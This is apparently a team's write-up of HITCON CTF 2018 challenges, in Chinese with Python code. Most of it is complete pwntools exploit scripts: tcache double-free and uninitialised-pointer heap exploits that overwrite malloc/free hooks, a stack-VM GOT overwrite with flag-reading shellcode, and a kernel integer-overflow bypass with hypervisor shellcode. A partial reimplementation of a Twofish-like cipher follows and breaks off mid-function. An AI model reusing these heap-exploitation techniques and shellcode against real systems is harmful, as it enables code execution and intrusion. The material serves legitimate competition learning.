EOP 那个题其实是 Twofish 加密:把下面 index_table 里的那些 32 位整数拿去 Google 就能搜到 Twofish 的查找表(所以不用从头逆算法)
2018 hitcon CTF
By Nu1L
比赛网址:https://ctf2018.hitcon.org/
比赛时间:2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC
PWN
children tcache
from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})   # local run against the shipped libc
p=remote('54.178.132.125', 8763)
# The shipped libc is only used for the __malloc_hook symbol offset below;
# the base address itself is leaked at runtime.
libc = ELF('./libc.so.6')
def add(size, data):
    """Menu option 1: allocate ``size`` bytes and fill them with ``data``.

    ``data`` is sent raw (no newline appended), so callers that need the
    program to see a line terminate it themselves.
    """
    for prompt, answer in (('choice', '1'), ('Size:', str(size))):
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('Data:')
    p.send(data)
def dele(index):
    """Menu option 3: free the chunk stored at ``index``."""
    for prompt, answer in (('choice', '3'), ('Index', str(index))):
        p.recvuntil(prompt)
        p.sendline(answer)
# Stage 1: seven 0x80 allocations freed in turn fill the tcache bin for that
# size class (glibc keeps at most 7 entries per bin), so later frees of the
# same size can reach the unsorted/small bins. Indices 0-6 are recycled by
# every loop below.
for i in range(7):
    add(0x80,'xxx\n')
for i in range(7):
    dele(i)
# Same for the 0x110 size class; chunks 7/8/9 stay live for now.
for i in range(7):
    add(0x110-8,'xxx\n')
add(0x110-8,'aaaa\n')#7
add(0x100,'bbbb\n')#8
add(0x100,'cccc\n')#9
for i in range(7):
    dele(i)
# With the tcache bin full, 8 and then 7 go to the unsorted bin (and
# presumably consolidate -- this is what makes the later overlap possible).
dele(8)
dele(7)
#raw_input()
for i in range(7):
    add(0x110-8,'aaaa\n') #0-6
# Chunk 7 is refilled to exactly its usable size; if the program copies with
# a terminating NUL this clobbers the low byte of the next chunk's size field
# (poison-null-byte). The underlying bug is not visible from this script.
add(0x110-8,'a'*(0x110-8))#7
for i in range(7):
    dele(i)
#raw_input()
for i in range(7):
    add(0x80,'1234567\n')#0-6
add(0x80,'xxxxxxxx\n')#8
for i in range(7):
    dele(i)
# Carve the corrupted region so that index 0 (0x60) and index 3 (0x500)
# overlap the same memory (see the note a few lines down).
add(0x60,'ABCD\n')#0
dele(8)
dele(9)
add(0x40,'a\n')#1
add(0x30,'b\n')#2
add(0x500,'aaaa\n')#3
add(0x120,'bbbb\n')#4
#0,3->same chunk
# Free 3 into the unsorted bin and "show" (option 2) index 0: the first
# 6 bytes printed are the bin's fd pointer, i.e. an address inside libc.
dele(3)
p.recvuntil('choice')
p.sendline('2')
p.recvuntil("Index:")
p.sendline('0')
addr = u64(p.recv(6).ljust(8,'\x00'))
# Leak-to-base distance (0x3ebca0) recorded from a local run against the
# shipped libc; re-derive it if the target libc changes.
libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000)
info("libc:0x%x",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
info("malloc hook:0x%x",malloc_hook)
# one_gadget offset for the shipped libc; its register constraints are not
# checked here, the size chosen at the end happened to satisfy them.
one = libc_base + 0x10a38c
# Stage 3: put the overlapping 0x120 chunk into tcache twice (the aliasing
# indices make dele(3)+dele(0) a double free that this glibc does not detect),
# then poison its fd pointer with __malloc_hook.
add(0x500,'aaaaa\n')#3
dele(3)
add(0x120,'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
add(0x120,p64(malloc_hook)+'\n')
add(0x120,p64(one)+'\n')
# This allocation is served from __malloc_hook itself; write the gadget there.
add(0x120,p64(one)+'\n')
# Any further malloc now jumps to the gadget: option 1 with size 304.
p.sendline('1')
p.sendline('304')
p.interactive()
Groot
指针未初始化
#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os
VERBOSE = 1          # 1: pwntools log_level DEBUG (every byte sent/received is shown)
DEBUG = 1            # 1: on a local run, pause with a ready-made gdb attach command
LOCAL = 0            # 0: connect to remote_addr:remote_port; 1: spawn ./groot locally
target = 'groot'
libc = []            # libc files to LD_PRELOAD on a local run (empty: system libc)
break_points = []    # addresses turned into -ex 'b *addr' for the gdb attach command
remote_addr = '54.238.202.201'
remote_port = 31733
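def hint(break_points=None):
    """Pause so the operator can attach gdb to the local target.

    Prints a ready-made ``gdb attach <pid>`` command -- one ``-ex 'b *addr'``
    per entry of ``break_points`` plus a trailing ``-ex 'c'`` when any were
    given -- and blocks on ``raw_input`` until the operator continues.
    Does nothing unless ``LOCAL`` is set.

    ``break_points`` now defaults to ``None`` (meaning no breakpoints); the
    previous mutable default list was shared between calls.
    """
    if not LOCAL:
        return
    if break_points is None:
        break_points = []
    out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
    for bp in break_points:
        out += " -ex 'b *{}'".format(hex(bp))
    raw_input(out + " -ex 'c'\n" if break_points else out + "\n")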
# if libc:
# elf = ELF(libc[0])
# gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
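# Spawn the target locally (optionally under a pre-loaded libc, with a gdb
# attach prompt) or connect to the remote instance.
if LOCAL:
    if libc:
        # All entries go into LD_PRELOAD. The previous per-entry assignment
        # overwrote the variable each iteration, so only the last libc (with
        # a dangling ':') was ever loaded.
        os.environ['LD_PRELOAD'] = ':'.join(os.environ['PWD'] + '/' + libc_ for libc_ in libc)
    p = process('./' + target)
    if DEBUG:
        # Same gdb-attach prompt as before, now shared with hint().
        hint(break_points)
else:
    p = remote(remote_addr, remote_port)
if VERBOSE:
    context.log_level = 'DEBUG'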
def mkdir(dir):
    """Send ``mkdir <dir>`` at the next ``$ `` prompt of the fake shell."""
    p.sendlineafter('$ ', 'mkdir %s' % dir)
def touch(name):
    """Send ``touch <name>`` at the next ``$ `` prompt."""
    p.sendlineafter('$ ', 'touch %s' % name)
def rm(name):
    """Send ``rm <name>`` at the next ``$ `` prompt (``name`` may hold raw bytes)."""
    p.sendlineafter('$ ', 'rm %s' % name)
def mkfile(name, content):
    """Create ``name`` with ``mkfile`` and answer the ``Content?`` prompt."""
    p.sendlineafter('$ ', 'mkfile %s' % name)
    p.sendlineafter('Content?', content)
def cd(dir):
    """Send ``cd <dir>`` at the next ``$ `` prompt."""
    p.sendlineafter('$ ', 'cd %s' % dir)
def ls(dir):
    """Send ``ls <dir>``, or a bare ``ls`` when ``dir`` is empty/falsy."""
    line = 'ls ' + dir if dir else 'ls'
    p.sendlineafter('$ ', line)
def mv(src, dst):
    """Send ``mv <src> <dst>`` at the next ``$ `` prompt."""
    p.sendlineafter('$ ', 'mv ' + src + ' ' + dst)
def exp(cmd=None):
    """Turn groot's fake shell into a libc leak and a hook overwrite.

    The bug named above is an uninitialised pointer in the in-memory
    filesystem; the primitive behind each command was worked out in gdb
    and cannot be reconstructed from this script alone, so the comments
    only say what each stage is for. ``cmd`` is accepted but never used.
    """
    # Stage 1: create, populate and delete a directory so that later entries
    # reuse its freed nodes; the 0x30-byte names keep them in one size class.
    mkdir('A'*0x30)
    cd('A'*0x30)
    touch('B'*0x30)
    cd('..')
    rm('A'*0x30)
    touch('X')
    touch('C'*0x30)
    rm('X')
    # A bare 'ls' now prints through a stale pointer: skip 0x14 bytes of
    # listing, take 6 bytes of a heap address and rebase with an offset
    # recorded from a local run.
    ls('')
    p.recv(0x14)
    heap = u64(p.recv(6).ljust(8,'\x00'))
    print hex(heap)
    heap_base = heap - 76864
    print hex(heap_base)
    # Stage 2: feed raw pointers and a fake 0x561 size field as names to
    # shape the heap; the 'HEHE' / 'D'*n listings are filler allocations.
    rm(p64(heap))
    # raw_input()
    ls(p64(heap_base+0x11fd0)[:-2])
    # raw_input()
    for i in range(4):
        ls('HEHE')
    # raw_input()
    ls('A'*8+p16(0x561))
    # Removing a pre-existing entry and listing '/' exposes a libc pointer
    # 0x10 bytes after the 'dev' entry.
    rm('/etc/passwd')
    ls('/')
    ls('/')
    ls('/')
    p.recvuntil('dev')
    p.recv(0x10)
    libc = u64(p.recv(6).ljust(8,'\x00'))
    print hex(libc)
    # NOTE(review): the leak offset 0x789ca0, the free_hook offset 7911656
    # (0x78b8e8) and the 3792896 (0x39e000) term in `magic` all carry the
    # same 0x39e000 bias, so `libc_base` is the real mapping base minus
    # 0x39e000. The constants are consistent with each other (0x3ebca0 and
    # 0x3ed8e8 once the bias is removed) but the name is misleading.
    libc_base = libc - 0x789ca0
    print hex(libc_base)
    # raw_input()
    for i in range(2):
        ls('D'*0x30)
    # raw_input()
    rm('/dev')
    # add bin sh
    # ls('')
    # Rename an existing entry to 'sh' so the final command has a target.
    mv('HEHE','sh')
    # mv('/bin/id','/bin/sh')
    # cd('../../../../../../../../../../../bin')
    for i in range(9):
        ls('D'*0x60)
    # ls('E'*0x40)
    # ls('E'*0x40)
    rm('/boot')
    ls('E'*0x40)
    # raw_input('hehehe')
    free_hook = 7911656 + libc_base
    malloc_hook = 0x789c30 + libc_base
    # `magic` is the gadget written into __free_hook (0x4f440 relative to the
    # true base, see the bias note above).
    magic = 0x4f440 + libc_base + 3792896
    ls('X'*0x40+p64(heap_base+0x50-0x28))
    ls('D'*0x30)
    # raw_input('sending free hook')
    # ls(p64(free_hook-0x28)[:-2])
    # raw_input()
    print hex(magic)
    print hex(free_hook)
    # Stage 3: plant the __free_hook address at offset 0x28 of a node, then
    # the next name written through it lands in __free_hook itself.
    rm('A'*0x28+p64(free_hook))
    # mkdir('../../../../../../../../../../../../../../bin/sh')
    # mv('/bin/id',p64(magic))
    ls(p64(magic))
    p.recvrepeat(1)
    # raw_input()
    # Freeing the argument string now calls the hook with that string as its
    # only argument; presumably the gadget treats it as a command path.
    p.sendline('rm ' + '../'*8+'home/groot/sh')
    # raw_input()
    # ls('123')
    # mkdir('ttt')
    # cd('ttt')
    # for i in range(10):
    # mkdir(str(i)*0x30)
    # mkdir('C'*0x30)
    # cd('C'*0x30)
    # touch('A'*0x30)
    # cd('..')
    # rm('C'*0x30)
    # touch()
    p.interactive()
if __name__ == '__main__':
    exp("id")   # the argument is ignored by exp()
Abyss I
是个堆栈机VM
swap 没有边界检查,可以越界到machine
把machine盖成负数,可以向上写got表
输入中放入shellcode,改shellcode跳过去即可
from pwn import *
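p = remote('35.200.23.198', 31731 if False else 31733)
context(arch = 'amd64', os = 'linux')
context.aslr = False
#p = process('./user.elf')
#gdb.attach(p)
#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
# The first 0x100 bytes are a program for the stack VM (opcodes per the
# notes above: the unchecked swap pushes the machine pointer negative so the
# next store lands in the GOT); the shellcode that follows is what the
# redirected GOT entry ends up calling. The exact meaning of each opcode
# character is not reproduced here.
payload = '4294967295\\'
# '//' keeps the repeat count an int on Python 3 too; under Python 2 the
# value is unchanged (26).
payload += '%' * ((0x2020a0 - 0x202030) // 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
# Distance from the clobbered slot to input+0x100, where the shellcode sits.
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
# payload += str(0x7BEC0 - 0x4f322) + '\x011'
# payload += ';-'
# payload += '0;'
# payload += '.'
payload += '0;'
payload += ','
payload = payload.ljust(0x100, '\x01')
# open('flag') -> fd 3 (0, 1, 2 are taken), read it onto the stack, print it.
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()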
Abyss II
系统调用号对应的处理函数(大概)
(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL')
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')
write_sys 应该可以溢出。。。。试一试
让 buf 的地址加上 size 在 64 位无符号加法下回绕成一个很小的数,就能绕过那个对 buf+size 上界的检查(典型的整数溢出绕过范围检查);下面脚本里 write 的长度 0x10000000000000000 - mmap_addr + 0x300000 就是这么算出来的,回绕后 buf+size == 0x300000。
kmalloc很大的数的时候会返回0,看了一下hypervisor似乎image base也是0,大概可以覆盖代码
hypervisor还有个蜜汁验证
已经能成功执行shellcode了,还需要逆一下串口的交互,手写一下open,read和write
from pwn import *
import time
context(arch = 'amd64', os = 'linux')
context.aslr = False
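def runshellcode(p, s):
    """Reuse the Abyss I VM bug to run the 64-bit shellcode ``s`` in user.elf.

    Sends the same VM program as the Abyss I solve: the first 0x100 bytes
    redirect control into the bytes that follow, which are a small stub that
    prints ``'aaaa'`` as a ready marker, reads up to 0x1000 bytes onto the
    stack and jumps there. Once the marker arrives ``s`` is sent, so ``s``
    must be at most 0x1000 bytes.

    ``'//'`` keeps the repeat count an int on Python 3 as well; under
    Python 2 the value is unchanged (26).
    """
    payload = '4294967295\\'
    payload += '%' * ((0x2020a0 - 0x202030) // 4 - 2)
    payload += '0:'
    payload += '1:'
    payload += '%%%%1;'
    payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
    payload += '0;'
    payload += ','
    payload = payload.ljust(0x100, '\x01')
    payload += asm('push 0x61616161')                      # 'aaaa' marker on the stack
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
    payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
    payload += asm('jmp rsp')
    p.sendline(payload)
    p.recvuntil('aaaa')
    p.send(s)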
# NOTE(review): the pasted listing lost its indentation; this line may have
# been the last statement of runshellcode() rather than module level.
context.log_level = 'debug'
def main():
    """Stage the Abyss II chain on top of the Abyss I user-space entry.

    Stage 1 (user shellcode) maps RWX memory at 0x500000, reads stage 2 into
    it and issues a write() whose length makes buf+size wrap (see the note
    above) so the kernel copies far past the buffer. Stage 2 is the code that
    then talks to the hypervisor's virtual serial port with port I/O. The
    file offsets (0xa5d, 0xadb), port numbers (0x8000-0x8002) and header
    layout were recovered by reversing and are not derivable from here.
    """
    p = remote('35.200.23.198', 31733)
    #p = process('./user.elf')
    #p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
    payload = ''
    mmap_addr = 0x500000
    # mmap(addr, 0x10000, 7 = RWX, 16 = MAP_FIXED, -1, 0) using Linux
    # constants; the custom kernel appears to mirror Linux numbering
    # (syscall table above).
    payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))     # echo mmap() result for debugging
    payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
    # Length = 2**64 - mmap_addr + 0x300000: buf + len wraps to 0x300000,
    # a small value that passes the kernel's upper-bound check.
    payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    runshellcode(p, payload)
    time.sleep(10)
    # Stage 2 image. The leading 'flag2' + three-word records presumably
    # form a header the kernel/hypervisor parses (layout from reversing).
    payload = 'flag2'.ljust(8, '\x00')
    payload += p64(3) + p64(0x100) + p64(0x100)
    payload += p64(1) + p64(0x100) + p64(0x100)
    # NOP sled to 0xa5d (+36), then three serial-port exchanges. Each stub
    # sets port (dx) and value (eax) and is followed by raw bytes
    # 0xEF = `out dx, eax` and 0xED = `in eax, dx`.
    payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
    payload += asm('''
    mov dx, 0x8000
    mov eax, 0x0
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8001
    mov eax, 0x8
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8002
    mov eax, 0x20
    ''')
    payload += '\xef\xed'
    payload += '\xeb\xfe'      # jmp $ : park here once the exchange is done
    payload = payload.ljust(0xadb, '\x90')
    # jmp short -0x80 from 0xadd lands exactly on the sled at 0xa5d.
    payload += '\xeb\x80'
    p.send(payload)
    p.interactive()
if __name__ == '__main__':
    main()   # script entry point; nothing else runs at import
Super Hexagon | solved 1, stuck 2 | pzhxbz
第一层
scanf里面似乎有一个溢出,可以覆盖函数指针
Reverse
EOP
感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。
使用gdb script进行跟踪
# Break at image base 0x8000000 + 0x5620 and, on every hit, append $rax
# (per the note below: the handler about to be called) to ./log.
b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
# $ipx is never cleared: the loop only ends when `continue` fails because
# the inferior has exited. The file is never flushed/closed explicitly, so
# a `python f.flush()` per iteration would make the log safer to read.
set $ipx=1
while ($ipx)
  python a = hex(gdb.parse_and_eval("$rax"))
  python f.write(a+'\n')
  continue
end
可以拿到程序的调用函数顺序,大致分析之后发现程序大概为3个循环对用户输入进行加密
大致分析后可以发现中间很多代码都是一样的,猜测是一个循环被拆分出来的结果。
于是半猜半蒙的一步一步还原算法 orz
还原之后的算法如下:
from pwn import *
index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3
823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,8092
47780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593,2195227374L,3070408630L,2719916717L,3461271273L,234491248,3775521105L,2926423596L,3696680183L,3984256464L,1240025481,1181238898,2833295576L,2691014694L,1205946243,142936318,642459319,1594318824,785264201,3579500024L,151783695,3934186197L,117704453,260116475,496573925,941635624,3858752814L,1051541212,1817209924,2994582072L,2393607791L,109905652,3859670612L,2118680154,2887167143L,1638555956,3643398521L,1916498651,2428539120L,3451702675L,3019158473L,1848340175,1416647788,2143387563,2587794053L,3679640562L,2978984258L,4001951402L,1400132457,558834098,3409038183L,2612501364L,667035462,853422685,2067233748,2629016689L,2761139289L,3529429757L,4284678094L,632890829,1842965941,4095079498L,816132310,3722435846L,1700554059,1214269560,2000975701,824979751,1359958498,3808158251L,2158198885L,2769986984L,1267878658,454302481,3299919004L,1958114351,4070109886L,328274927,4193253690L,967391705,1020673111,345314538,3958893348L,2870127522L,235408906,2035054943,2580322815L,2437517569L,3225862371L,205
9303461,3283403673L,184420981,1324174988,1517836902,3727548028L,3187457475L,2203157279L,1392333464,758918451,41616011,908604962,25756145,4167497931L,0,3144792887L,2461766267L,1967093214,1755736123,2637864320L,3035673804L,4078039887L,3258827368L,470817812,208866433,793194424,2808194851L,3401108118L,2251196049L,4276878911L,2486604943L,534912878,1559583890,1502239004,426711450,1476614381,4196268608L,1284918279,3634419848L,3485978392L,3752124301L,2842274089L,3671841283L,708323894,1142113529,3335243287L,1993176740,903492952,4050317764L,2321386000L,2521667076L,1350979603,1764714954,877868201,2220196890L,303567390,2371456277L,2245821931L,392632208,3975408673L,2362477796L,2744623964L,979057315,4041470005L,3343042534L,4134467265L,417732715,300552548,590619449,3766542496L,2512360830L,2401406878L,1691706554,2862328403L,2800264914L,2912922966L,2951000029L,861352876,3609319283L,549855299]
index_table4 = [3254152897L,164942601,2959793584L,416270104,3784037601L,3834433764L,1757560168,4258422525L,2986054833L,2131031679,4036018416L,3644434905L,1563614813,736295723,398904087,1403689811,528699679,0,3384014025L,2215344004L,759112749,1277807180,3357720008L,1943478643,2539385239L,2491493012L,3634946264L,1303937869,3153435835L,425627161,4132249590L,545110560,2202526083L,1090133312,4120364277L,3072740279L,1657550178,2380244109L,3514577873L,1542390107,2278665351L,2295898248L,1871620975,598171939,2927150510L,3534153938L,475630108,3311412165L,504502302,1917216882,749628716,286987281,3695095260L,4174732024L,1963654773,1373702481,3543638483L,1787408234,1118932802,76958980,2353982860L,3284008131L,3672339162L,989458234,935031095,2324902538L,4261971454L,3257710018L,361584917,821552944,3422054091L,1956362100,2660180638L,1717205094,958608441,454368283,3972614892L,698968361,4074459890L,573974562,828812849,4094070260L,2241478277L,1203145543,2123743102,1341329743,3981968365L,3843922405L,1174214981,2455565714L,3871818470L,878815796,337383444,904979253,2951318703L,138779144,657533991,84345861,786825006,4011037167L,2000776311,2829392552L,3564845012L,222469645,2889045932L,3681696731L,3173532605L,2157787776L,1702929253,244860174,2165076865L,3090106296L,2094935420,3719292125L,2044275065,4232255484L,2252400006L,1678895716,2332195723L,2408855183L,3796963298L,1796793963,712225322,314691346,2699067552L,3756291807L,1601784927,2579739801L,2783413413L,1227804233,4181988345L,3617713367L,3881176039L,2759249316L,1667071075,628801061,4081720307L,1741369703,4001552622L,2789040038L,3341529543L,3227985856L,122459655,1847583342,2867759274L,3441801677L,1628892769,215209740,3043875253L,1424362836,499696413,2479733907L,1126221379,3472843470L,1906094961,1463604823,1264933963,3065447094L,2500879253L,1619502944,1479924312,2195105922L,3927217642L,444880154,4212097531L,1454219094,3759840736L,1047503422,115203846,2303322505L,619444004,2047079034,1097552961,3821029091L,2441490065L,674766888,2639657373L,3
588914901L,1177010758,1817473132,569176865,1349533776,1518225498,3732226014L,648045862,1220511560,2988527538L,3505224400L,908736566,2877276587L,3210990015L,2838778793L,1592264030,851211570,26298625,1073670975,1433879637,951221560,3334142150L,4288269567L,2913083053L,1554224988,38507010,1993352566,2729120418L,3898542056L,996714043,3036450996L,4043409905L,168691722,3480103887L,1879964272,3593512406L,2102355069,194986251,1503957849,3951418603L,64674563,1035303229,1147949124,1257510218,4158412535L,1841641837,2073213819,1379652178,2669570975L,2382725006L,2555575704L,1767076969,3166243516L,858602547,3127170490L,2018009208,3116240569L,2738510755L,1009004604,252251151,2529867926L,2708588961L,3203569854L,3395891146L,796177967,2417452944L,3304155844L,3434410188L,4204710138L,277503248,2630135964L,3922611945L,2609391259L,2585358234L,324044307,1315067982,2813073063L,374833686,3014657715L]
xor_table = [40806489, 4046542995L, 2337878950L, 3878399079L, 449612036, 776524271, 1059181995, 1764973087, 3196283120L, 4059530435L, 404769168, 416194920, 865505623, 569110855, 4202362994L, 2884025964L, 1364091262, 3967238082L, 3323511658L, 4191090596L, 1977398017, 2934017146L, 619849321, 2598057311L, 2001658147, 3371447456L, 4101937135L, 1132035575, 4142164549L, 95912149, 3823222592L, 1423799602]
flag = raw_input()   # consumed from stdin but never used below; the flag is computed from de_flag
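def to_bytes(d):
    """Split the low 32 bits of ``d`` into four bytes, least-significant first.

    Returns ``[b0, b1, b2, b3]`` with ``b0`` the low byte -- the order the
    S-box look-ups in ``en``/``de`` index with. Uses shifts and masks
    instead of slicing ``hex(d)``: the old form depended on the exact hex
    representation (Python 2 appends ``L`` to longs, which defeated the
    fixed-width padding) and on ``xrange``.
    """
    return [(d >> (8 * k)) & 0xff for k in range(4)]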
def ROR(d, n):
    """Rotate the 32-bit value ``d`` right by ``n`` bits (0 < n < 32)."""
    low = d >> n
    high = d << (32 - n)
    return (low | high) & 0xffffffff
def ROL(d, n):
    """Rotate the 32-bit value ``d`` left by ``n`` bits (0 < n < 32)."""
    high = d << n
    low = d >> (32 - n)
    return (high | low) & 0xffffffff
def en(data):
    """Encrypt one 16-byte block with the round function recovered from EOP.

    ``data`` is read as four little-endian words (``u32``), whitened with
    fixed constants, run through eight double-rounds of table look-ups,
    rotate-by-one and XOR, whitened again and emitted as
    ``p32(t3) + p32(t4) + p32(t1) + p32(t2)`` -- note the swapped word order
    on output. The note at the top of the write-up identifies the cipher as
    Twofish; the structure here is consistent with that but not verified.
    The per-round hex trace is kept for comparison with the gdb log.
    """
    mask = 0x100000000

    def sbox_a(word):
        b = to_bytes(word)
        return index_table1[b[0]] ^ index_table2[b[1]] ^ index_table3[b[2]] ^ index_table4[b[3]]

    def sbox_b(word):
        b = to_bytes(word)
